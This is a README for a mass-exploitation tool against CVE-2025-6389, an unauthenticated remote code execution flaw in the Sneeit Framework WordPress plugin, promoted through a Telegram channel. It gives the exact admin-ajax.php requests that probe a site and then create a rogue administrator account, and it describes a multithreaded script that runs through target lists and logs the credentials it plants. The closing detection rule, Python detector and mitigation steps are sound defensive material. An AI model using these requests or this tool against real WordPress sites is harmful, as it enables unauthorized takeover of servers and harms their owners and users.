## https://sploitus.com/exploit?id=59160A6E-A25D-5C2D-9849-00B314FADCBE
# CVE-2025-6389
Sneeit Framework <= 8.3 - Unauthenticated Remote Code Execution in sneeit_articles_pagination_callback


[![Telegram](https://img.shields.io/badge/Telegram-KNxploited-2CA5E0?style=for-the-badge&logo=telegram&logoColor=white)](https://t.me/KNxploited)
[![CVE](https://img.shields.io/badge/CVE-2025--6389-critical?style=for-the-badge&logo=cve&logoColor=white&color=CC0000)](https://vulners.com/cve/CVE-2025-6389)
[![CVSS](https://img.shields.io/badge/CVSS-9.8%20CRITICAL-red?style=for-the-badge)](https://nvd.nist.gov/vuln/detail/CVE-2025-6389)
[![Python](https://img.shields.io/badge/Python-3.8%2B-blue?style=for-the-badge&logo=python&logoColor=white)](https://python.org)
[![License](https://img.shields.io/badge/License-Educational%20Only-yellow?style=for-the-badge)](#%EF%B8%8F-disclaimer)



> 📡 **Don't miss the next drop.**
> Follow **[@KNxploited](https://t.me/KNxploited)** on Telegram, the definitive channel for freshly disclosed CVEs, working exploits, and elite security research. First to know. First to act.



---

## 🧠 Overview

**CVE-2025-6389** is a **CVSS 9.8 Critical** Remote Code Execution vulnerability found in the **Sneeit Framework** plugin for WordPress.

The flaw exists in the `sneeit_articles_pagination_callback()` function, which passes **user-supplied input** straight into PHP's `call_user_func()`. An unauthenticated attacker can therefore invoke any PHP function with arbitrary arguments, including `wp_insert_user`, and so grant themselves **full administrator access** or run any server-side code.

| Field                | Details                                      |
|----------------------|----------------------------------------------|
| **CVE ID**           | CVE-2025-6389                                |
| **Plugin**           | Sneeit Framework (`sneeit-framework`)        |
| **Affected Versions**| All versions up to and including **8.3**     |
| **Vulnerability Type** | Remote Code Execution (RCE)               |
| **Attack Vector**    | Network, no authentication required          |
| **CVSS 3.1 Score**   | **9.8 CRITICAL**                             |
| **CVSS Vector**      | `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`       |
| **CNA**              | Wordfence                                    |
| **Impact**           | Full server compromise / Admin takeover      |
| **Researcher**       | Nxploited                                    |

---

## 💀 Vulnerability Deep Dive

The root cause is misuse of PHP's `call_user_func()` in the plugin's AJAX handler:

```php
// Registered without authentication check
add_action('wp_ajax_nopriv_sneeit_articles_pagination', 'sneeit_articles_pagination_callback');

function sneeit_articles_pagination_callback() {
    $callback = $_POST['callback'];  // ← User-controlled function name
    $args     = json_decode(stripslashes($_POST['args']), true); // ← User-controlled args

    // Calling ANY PHP function with ANY arguments: zero validation
    $result = call_user_func($callback, ...$args);

    echo $result;
    die();
}
```

**Why this is critical:**
- `wp_ajax_nopriv_*` = accessible by **anyone, no login required**
- `call_user_func($callback, $args)` = arbitrary function invocation
- Attacker can call `var_dump`, `system`, `wp_insert_user`, `eval`, or any PHP/WordPress function
- The response is returned directly, enabling **blind & verbose RCE**

---

## โš”๏ธ Exploit Chain

```
Step 1 - Probe / Fingerprint
──────────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action   = sneeit_articles_pagination
  callback = var_dump
  args     = ["test"]

Expected Response → array(1) { [0]=> string(4) "test" }
  ↓
Confirms: call_user_func() is reachable and reflecting output

──────────────────────────────────────────────────────────────────────
Step 2 - Admin Account Creation
──────────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action   = sneeit_articles_pagination
  callback = wp_insert_user
  args     = {"user_login":"Nxploited_XXXX",
               "user_pass":"xplpass",
               "user_email":"...",
               "role":"administrator"}

Result → New administrator account silently created on target
  ↓
Full WordPress admin panel access achieved ✔️
```

---

## โš™๏ธ Requirements

```bash
pip install requests rich
```

| Dependency  | Purpose                                                     |
|-------------|-------------------------------------------------------------|
| `requests`  | HTTP requests with session/proxy support                    |
| `rich`      | Live terminal dashboard, panels, progress                   |
| `threading` | Concurrent multi-target processing (standard library)       |
| `queue`     | Thread-safe target distribution (standard library)          |

> Python **3.8+** required. Type hints use the `tuple[...]` syntax introduced in 3.9, so use 3.9+ for best compatibility.

---

## 📂 File Structure

```
CVE-2025-6389/
├── CVE-2025-6389.py          # Main exploit script
├── list.txt                  # Target URLs, one per line
├── success_results.txt       # Auto-generated: successful targets + credentials
└── debug_responses/          # Auto-generated: raw server responses for debugging
    └── .resp.txt
```

---

## 🚀 Usage

### Step 1 - Prepare Targets

Create `list.txt` with one URL per line:

```
https://target1.com
https://target2.com
http://target3.com
```

> URLs without `http://` or `https://` are automatically prefixed with `http://`.

---

### Step 2 - Run the Exploit

```bash
python CVE-2025-6389.py
```

You will be prompted:

```
Targets file name (default list.txt): list.txt
Number of threads (default 10):       20
```

---

### Step 3 - Live Dashboard

The script launches a **real-time Rich dashboard** showing:

```
┌─────────────────────────────────────────────────────────────────────┐
│  [ASCII BANNER]                                                     │
├──────────────────────────────┬──────────────────────────────────────┤
│  Info                        │  Stats                               │
│  Usage: Put targets in...    │  Total Targets:  150                 │
│  Threads: 20                 │  Processed:      87                  │
│  Password: xplpass           │  Successes:      12                  │
│  Success Log: success...     │  Failures:       75                  │
│  Debug Dir: debug_responses  │  Elapsed:        00:01:43            │
├──────────────────────────────┴──────────────────────────────────────┤
│  Recent Results                                                     │
│  Time     Target                              Result                │
│  14:23:01 https://victim.com                  SUCCESS               │
│  14:23:03 https://example.net                 FAIL                  │
└─────────────────────────────────────────────────────────────────────┘
```

---

### Step 4 - Review Results

**Successful exploits** are saved to `success_results.txt`:

```
https://victim.com | USER: Nxploited_4821 | PASS: xplpass | EMAIL: Nxploited_4821@gmail.com
```

**Debug responses** (for failed targets) are saved under `debug_responses/`:

```
debug_responses/
└── https___victim.com.resp.txt   ← Raw server response for analysis
```

---

## ๐Ÿ–ฅ๏ธ Script Parameters Reference

| Prompt              | Default             | Description                                   |
|---------------------|---------------------|-----------------------------------------------|
| Targets file        | `list.txt`          | File containing target URLs                   |
| Number of threads   | `10` (max: `200`)   | Concurrent workers, increase for bulk scans   |
| Password            | `xplpass` (hardcoded) | Password set for created admin accounts     |
| Username format     | `Nxploited_XXXX`    | Auto-generated with random 4-digit suffix     |

---

## 📊 Detection Signature

The exploit generates the following network signature, useful for defenders and WAF rule authors:

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=sneeit_articles_pagination&callback=&args=
```

**WAF / IDS Rule (Pseudocode):**
```
IF request.method == POST
AND request.path  == "/wp-admin/admin-ajax.php"
AND request.body CONTAINS "sneeit_articles_pagination"
AND request.body CONTAINS "callback"
THEN BLOCK + ALERT
```
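The pseudocode above as working detection logic, written here as an added example (it is not part of the original tool): it parses request records in the shape a reverse proxy or WAF hands to a rule, keys on the `action` and `callback` parameters from the signature above, and grades each hit by the callback name the write-up discusses. The record layout and the sample requests are constructed for the example.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import parse_qs

# Constructed sample records (method, path, form body), shaped like what a
# reverse proxy or WAF hands a detection rule; not captured traffic.
SAMPLE_REQUESTS: List[Tuple[str, str, str]] = [
    ("POST", "/wp-admin/admin-ajax.php",
     "action=sneeit_articles_pagination&callback=var_dump&args=%5B%22test%22%5D"),
    ("POST", "/wp-admin/admin-ajax.php",
     "action=sneeit_articles_pagination&callback=wp_insert_user"
     "&args=%7B%22role%22%3A%22administrator%22%7D"),
    ("POST", "/wp-admin/admin-ajax.php", "action=heartbeat&_nonce=abc123"),
    # The handler reads $_POST, so a GET carrying the same parameters never
    # reaches call_user_func(); the rule skips it, as the pseudocode does.
    ("GET", "/wp-admin/admin-ajax.php", "action=sneeit_articles_pagination&callback=system"),
]

# Callback names the write-up singles out: var_dump is the fingerprint probe,
# the others yield code execution or an administrator account outright.
# Any other name is still flagged as suspicious.
SEVERITY = {"var_dump": "probe", "system": "critical",
            "eval": "critical", "wp_insert_user": "critical"}


@dataclass
class Finding:
    severity: str        # "critical", "probe" or "suspicious"
    callback: str
    args: Optional[str]  # raw args parameter, kept for the analyst


def inspect_request(method: str, path: str, body: str) -> Optional[Finding]:
    """Apply the signature to one request record; None means no match."""
    if method.upper() != "POST" or path.split("?", 1)[0] != "/wp-admin/admin-ajax.php":
        return None
    params = parse_qs(body, keep_blank_values=True)
    if params.get("action", [""])[0] != "sneeit_articles_pagination":
        return None
    if "callback" not in params:
        return None  # without a callback the handler cannot reach call_user_func()
    callback = params["callback"][0].strip()
    severity = SEVERITY.get(callback.lower(), "suspicious")
    return Finding(severity, callback, params.get("args", [None])[0])


def scan(records: List[Tuple[str, str, str]]) -> List[Finding]:
    """Run the rule over a batch and keep only the hits."""
    return [f for f in (inspect_request(*r) for r in records) if f is not None]
```

Once the site's own legitimate pagination callback name is known from clean traffic, it is the one value worth allowlisting; everything else reaching this action should alert.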

---

## ๐Ÿ›ก๏ธ Mitigation & Remediation

If you are a **site owner, developer, or defender**, take these steps immediately:

- ✅ **Update** Sneeit Framework to a version **above 8.3** if a patch is available
- ✅ **Deactivate and delete** the plugin until a patched version is confirmed
- ✅ **Audit** recently created WordPress admin accounts for unauthorized entries
- ✅ **Implement** server-side input validation; never pass user input into `call_user_func()`
- ✅ **Block** unauthenticated POST requests to `admin-ajax.php` at the WAF/Firewall level (many themes and plugins rely on unauthenticated `admin-ajax.php` calls, so scope the rule to the `sneeit_articles_pagination` action where possible)
- ✅ **Monitor** server logs for `sneeit_articles_pagination` AJAX action calls
- ✅ **Enable** two-factor authentication on all existing admin accounts as a containment measure

---

## โš ๏ธ Disclaimer

```
THIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL, AUTHORIZED PENETRATION
TESTING, AND SECURITY RESEARCH PURPOSES ONLY.

By downloading, running, or modifying this script, you explicitly agree:

  • You have EXPLICIT, WRITTEN authorization from the owner of every
    system you test. No exceptions.

  • You are operating within a controlled lab environment or during a
    formally scoped and authorized engagement.

  • You will NOT deploy this tool against any system, network, or
    infrastructure you do not have legal permission to test.

  • Nxploited and all contributors assume ZERO liability for any
    unauthorized use, damage, data loss, legal action, or criminal
    prosecution arising from the use of this tool.

Unauthorized use of this exploit is a criminal offense under:
  - Computer Fraud and Abuse Act (CFAA), USA
  - Computer Misuse Act (CMA), UK
  - EU Directive 2013/40/EU on Attacks Against Information Systems
  - And all equivalent national and international cybercrime laws.

USE RESPONSIBLY. HACK ETHICALLY. DISCLOSE RESPONSIBLY.
```

---

## 👤 Author



|               |                                                                |
|---------------|----------------------------------------------------------------|
| **Handle**    | Nxploited (Khaled Alenazi)                                    |
| **Telegram**  | [@KNxploited](https://t.me/KNxploited)                        |
| **GitHub**    | [github.com/Nxploited](https://github.com/Nxploited)          |



> 🔔 **Follow [@KNxploited](https://t.me/KNxploited) on Telegram**
> The channel where real exploits drop first: CVEs, zero-days, PoCs,
> and deep-dive vulnerability research. Updated regularly. Stay sharp.



---


  Crafted with precision by Nxploited · For authorized security research only · CVSS 9.8 Critical